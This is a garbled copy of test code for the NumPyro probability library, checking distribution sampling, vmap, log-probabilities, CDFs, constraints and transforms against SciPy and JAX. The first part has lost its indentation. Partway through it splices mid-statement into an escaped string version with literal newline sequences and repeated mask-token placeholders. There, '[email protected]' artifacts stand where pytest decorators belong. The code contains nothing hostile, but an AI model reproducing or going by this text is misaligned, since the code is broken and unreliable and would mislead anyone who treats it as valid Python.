if isinstance(a1, np.ndarray):
return np.allclose(a2, a1)
elif isinstance(a1, jnp.ndarray):
return jnp.allclose(a2, a1)
elif isinstance(a1, csr_matrix):
return np.allclose(a2.todense(), a1.todense())
else:
return a2 == a1 or a2 is a1
def _tree_equal(t1, t2):
t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)
return jnp.all(jax.flatten_util.ravel_pytree(t)[0])
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_vmap_dist(jax_dist, sp_dist, params):
param_names = list(inspect.signature(jax_dist).parameters.keys())
vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)
vmappable_param_idxs = vmappable_param_idxs[: len(params)]
if len(vmappable_param_idxs) == 0:
return
def make_jax_dist(*params):
return jax_dist(*params)
def sample(d: dist.Distribution):
return d.sample(random.PRNGKey(0))
d = make_jax_dist(*params)
if isinstance(d, _SparseCAR) and d.is_sparse:
# In this case, since csr arrays are not jittable,
# _SparseCAR has a csr_matrix as part of its pytree
# definition (not as a pytree leaf). This causes pytree
# operations like tree_map to fail, since these functions
# compare the pytree def of each of the arguments using ==
# which is ambiguous for array-like objects.
return
in_out_axes_cases = [
# vmap over all args
(
tuple(0 if i in vmappable_param_idxs else None for i in range(len(params))),
0,
),
# vmap over a single arg, out over all attributes of a distribution
*(
([0 if i == idx else None for i in range(len(params))], 0)
for idx in vmappable_param_idxs
if params[idx] is not None
),
# vmap over a single arg, out over the associated attribute of the distribution
*(
(
[0 if i == idx else None for i in range(len(params))],
vmap_over(d, **{param_names[idx]: 0}),
)
for idx in vmappable_param_idxs
if params[idx] is not None
),
# vmap over a single arg, axis=1, (out single attribute, axis=1)
*(
(
[1 if i == idx else None for i in range(len(params))],
vmap_over(d, **{param_names[idx]: 1}),
)
for idx in vmappable_param_idxs
if isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).ndim > 0
            # skip this distribution because _GeneralMixture.__init__ turns
            # 1d inputs into 0d attributes, which breaks the expectations of
            # the vmapping test case where in_axes=1 (only done for rank>=1 tensors).
and jax_dist is not _GeneralMixture
),
]
for in_axes, out_axes in in_out_axes_cases:
batched_params = [
jax.tree_map(lambda x: jnp.expand_dims(x, ax), arg)
if isinstance(ax, int)
else arg
for arg, ax in zip(params, in_axes)
]
# Recreate the jax_dist to avoid side effects coming from `d.sample`
# triggering lazy_property computations, which, in a few cases, break
# vmap_over's expectations regarding existing attributes to be vmapped.
d = make_jax_dist(*params)
batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes)(
*batched_params
)
eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(
batched_d, d
)
assert eq == jnp.array([True])
samples_dist = sample(d)
samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)
assert samples_batched_dist.shape == (1, *samples_dist.shape)
def test_multinomial_abstract_total_count():
probs = jnp.array([0.2, 0.5, 0.3])
key = random.PRNGKey(0)
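    # Under jit, total_count = x.sum(-1) is an abstract tracer; total_count_max provides a
    # concrete upper bound so sampling can still be compiled.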
def f(x):
total_count = x.sum(-1)
return dist.Multinomial(total_count, probs=probs, total_count_max=10).sample(
key
)
x = dist.Multinomial(10, probs).sample(key)
y = jax.jit(f)(x)
assert_allclose(x, y, rtol=1e-6)
def test_normal_log_cdf():
# test if log_cdf method agrees with jax.scipy.stats.norm.logcdf
# and if exp(log_cdf) agrees with cdf
loc = jnp.array([[0.0, -10.0, 20.0]])
scale = jnp.array([[1, 5, 7]])
values = jnp.linspace(-5, 5, 100).reshape(-1, 1)
numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)
numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)
jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)
assert_allclose(numpyro_log_cdf, jax_log_cdf)
assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-6)
@pytest.mark.parametrize(
"value",
[
-15.0,
jnp.array([[-15.0], [-10.0], [-5.0]]),
jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]]),
],
)
def test_truncated_normal_log_prob_in_tail(value):
    # define a set of distributions truncated in the tail of the distribution
    loc = 1.35
    scale = jnp.geomspace(0.01, 1, 10)
    low, high = (-20, -1.0)
    a, b = (low - loc) / scale, (high - loc) / scale  # standardized bounds for truncnorm
numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high).log_prob(
value
)
jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)
assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)
def test_sample_truncated_normal_in_tail():
    # test that samples from a distribution truncated in
    # its tail do not contain any infs
tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)
samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10_000,))
assert ~jnp.isinf(samples).any()
@jax.enable_custom_prng()
def test_jax_custom_prng():
samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))
assert ~jnp.isinf(samples).any()
sample_shape=(N,))\n return (z + z ** 2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean ** 2\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\[email protected]('jit', [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples\n ).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (dist.LeftTruncatedDistribution, dist.\n RightTruncatedDistribution, dist.TwoSidedTruncatedDistribution)\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], dist.Distribution):\n loc, scale, low, high = params[0].loc, params[0].scale, params[\n 1], params[2]\n else:\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(sp_dist.cdf(high) -\n sp_dist.cdf(low))\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected,\n atol=1e-05)\n return\n pytest.skip('no corresponding scipy distn.')\n if _is_batched_multivariate(jax_dist):\n pytest.skip('batching not allowed in multivariate distns.')\n if jax_dist.event_shape and prepend_shape:\n pytest.skip(\n 'batched samples cannot be scored by multivariate distributions.')\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e\n ):\n samples = jax.device_get(samples).astype('float64')\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-05)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(dist.Categorical(logits=np.zeros(2)), dist\n .Normal(0, 1).expand([2]))\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + [T(dist.\n Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))])\[email protected]('ignore:overflow encountered:RuntimeWarning')\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n pytest.skip(\n 'skip testing cdf/icdf methods of multivariate distributions')\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 0.002 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-05\n if d.shape() == () and not d.is_discrete:\n assert_allclose(jax.vmap(jax.grad(d.cdf))(samples), jnp.exp(d.\n log_prob(samples)), atol=1e-05, rtol=rtol)\n assert_allclose(jax.vmap(jax.grad(d.icdf))(quantiles), jnp.exp(\n -d.log_prob(d.icdf(quantiles))), atol=1e-05, rtol=rtol)\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-05,\n rtol=1e-05)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-05, rtol=rtol)\n except NotImplementedError:\n pass\n if not sp_dist:\n 
pytest.skip('no corresponding scipy distn.')\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-05, rtol=1e-05)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=0.0001, rtol=0.0001)\n except NotImplementedError:\n pass\n\n\n<mask token>\n\n\[email protected]('dimension', [2, 3, 5])\[email protected]('concentration', [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n d = dist.LKJCholesky(dimension, concentration, sample_method='cvine')\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(\n partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky\n ).log_abs_det_jacobian(unconstrained, sample)\n signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = (beta_log_prob - affine_logdet -\n signed_stick_breaking_logdet)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-05)\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-06\n )\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(0, 20, (1000, 100))\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n num_samples = 100000\n probs = np.random.beta(concentration1, concentration0, size=(\n num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.BetaBinomial(concentration1, concentration0, total_count\n ).log_prob(value)\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('batch_shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = 3,\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n value = total_count * jnp.eye(event_shape[-1]).reshape(event_shape + (1\n ,) * len(batch_shape) + event_shape)\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (\n num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.DirichletMultinomial(concentration, total_count).log_prob(\n value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(1,), (3, 1), 
(2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n num_samples = 300000\n poisson_rate = np.random.gamma(gamma_conc, 1 / gamma_rate, size=(\n num_samples,) + shape)\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, dist.LKJCholesky]:\n pytest.skip('we have separated tests for LKJCholesky distribution')\n if jax_dist is _ImproperWrapper:\n pytest.skip(\n 'no param for ImproperUniform to test for log_prob gradient')\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n eps = 0.001\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n continue\n if jax_dist is _SparseCAR and i == 3:\n continue\n if isinstance(params[i], dist.Distribution):\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32,\n jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01,\n atol=0.01)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, _GaussianMixture,\n _Gaussian2DMixture, _GeneralMixture, _General2DMixture):\n pytest.skip(f'{jax_dist.__name__} is a function, not a class')\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky\n ) and dist_args[i] != 'concentration':\n continue\n if 'SineSkewed' in jax_dist.__name__ and dist_args[i] != 'skewness':\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != 't':\n continue\n if jax_dist is dist.TwoSidedTruncatedDistribution and dist_args[i\n ] == 'base_dist':\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == 'num_steps':\n continue\n if jax_dist is dist.SineBivariateVonMises and dist_args[i\n ] == 'weighted_correlation':\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n valid_params[i] = gen_values_within_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n if jax_dist is dist.MultivariateStudentT:\n 
valid_params[0] += 1\n if jax_dist is dist.LogUniform:\n valid_params[1] += valid_params[0]\n assert jax_dist(*oob_params)\n if not dependent_constraint and (jax_dist is not _ImproperWrapper and \n 'SineSkewed' not in jax_dist.__name__):\n with pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n with pytest.raises(ValueError):\n oob_params = jax.device_get(oob_params)\n\n def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n jax.jit(dist_gen_fn)()\n d = jax_dist(*valid_params, validate_args=True)\n if sp_dist and not _is_batched_multivariate(d) and not (d.event_shape and\n prepend_shape):\n valid_samples = gen_values_within_bounds(d.support, size=\n prepend_shape + d.batch_shape + d.event_shape)\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-05,\n rtol=1e-05)\n oob_samples = gen_values_outside_bounds(d.support, size=prepend_shape +\n d.batch_shape + d.event_shape)\n with pytest.warns(UserWarning, match='Out-of-support'):\n d.log_prob(oob_samples)\n with pytest.warns(UserWarning, match='Out-of-support'):\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n with pytest.raises(ValueError, match='got invalid'):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n with pytest.warns(UserWarning, match='Out-of-support'):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(\n data).sum()\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data\n ).sum()\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-06)\n assert_allclose(grad_fx, grad_gx, atol=0.0001)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(ValueError,\n match='^BetaProportion distribution got invalid mean parameter\\\\.$'):\n dist.BetaProportion(1.0, 1.0)\n\n\n<mask token>\n\n\[email protected]('constraint', [constraints.corr_cholesky,\n constraints.corr_matrix, constraints.greater_than(2), constraints.\n interval(-3, 5), constraints.l1_ball, constraints.less_than(1),\n constraints.lower_cholesky, constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector, constraints.positive, constraints.\n positive_definite, constraints.positive_ordered_vector, constraints.\n real, constraints.real_vector, constraints.simplex, constraints.\n softplus_positive, constraints.softplus_lower_cholesky, constraints.\n unit_interval, constraints.open_interval(0.0, 1.0)], ids=lambda x: x.\n __class__)\[email protected]('shape', [(), (1,), (3,), (6,), (3, 1), (1, 3), (5,\n 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == 
constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=\n jnp.bool_))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-05, rtol=1e-05)\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)\n [:, :-1])[1]\n elif constraint in [constraints.real_vector, constraints.\n ordered_vector, constraints.positive_ordered_vector,\n constraints.l1_ball]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x),\n diagonal=-1)\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1\n ) + jnp.identity(matrix.shape[-1])\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n elif constraint in [constraints.lower_cholesky, constraints.\n scaled_unit_lower_cholesky, constraints.positive_definite,\n constraints.softplus_lower_cholesky]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x))\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if constraint is constraints.positive_definite:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1) - jnp.diag(\n jnp.diag(matrix))\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-05, rtol=1e-05)\n assert_allclose(actual, -inv_expected, atol=1e-05, rtol=1e-05)\n\n\[email protected]('transform, event_shape', [(PermuteTransform(np.\n array([3, 0, 4, 1, 2])), (5,)), (PowerTransform(2.0), ()), (\n SoftplusTransform(), ()), (LowerCholeskyAffine(np.array([1.0, 2.0]), np\n .array([[0.6, 0.0], [1.5, 0.4]])), (2,)), (transforms.ComposeTransform(\n [biject_to(constraints.simplex), SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv]), (5,))])\[email protected]('batch_shape', [(), (1,), (3,), (6,), (3, 1), (1, \n 3), (5, 3)])\ndef test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = 
biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-06, rtol=0.0001)\n assert transform.inv.inv is transform\n assert transform.inv is transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-06)\n assert_allclose(actual, -inv_expected, atol=1e-06)\n\n\n<mask token>\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, z\n ) + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\n<mask token>\n\n\[email protected]('transformed_dist', [dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()),\n dist.TransformedDistribution(dist.Exponential(jnp.ones(2)), [transforms\n .PowerTransform(0.7), transforms.AffineTransform(0.0, jnp.ones(2) * 3)])])\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(random\n .PRNGKey(1))\n assert_allclose(transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_generated_sample_distribution(jax_dist, sp_dist, params, N_sample=\n 100000, key=random.PRNGKey(11)):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. 
we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n '{} sampling method taken from upstream, no need totest generated samples.'\n .format(jax_dist.__name__))\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE)\[email protected]('prepend_shape', [(), (2, 3)])\[email protected]('sample_shape', [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert expanded_dist.log_prob(samples\n ).shape == sample_shape + new_batch_shape\n assert expanded_dist.expand((3,) + new_batch_shape).batch_shape == (3,\n ) + new_batch_shape\n if prepend_shape:\n with pytest.raises(ValueError, match=\n 'Cannot broadcast distribution of shape'):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\n<mask token>\n\n\[email protected]('extra_event_dims,expand_shape', [(0, (4, 3, 2, 1)\n ), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))])\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = 4, 1, 1, 1, 6\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n with pytest.raises((RuntimeError, ValueError)):\n large.expand(expand_shape[1:])\n\n\n<mask token>\n\n\[email protected]('event_shape', [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(jnp.isfinite(data), tuple(-i - 1 for i in range(len(\n event_shape))))\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[:len(data.shape) - len(event_shape)\n ]\n return log_prob.sum()\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\n<mask token>\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == 
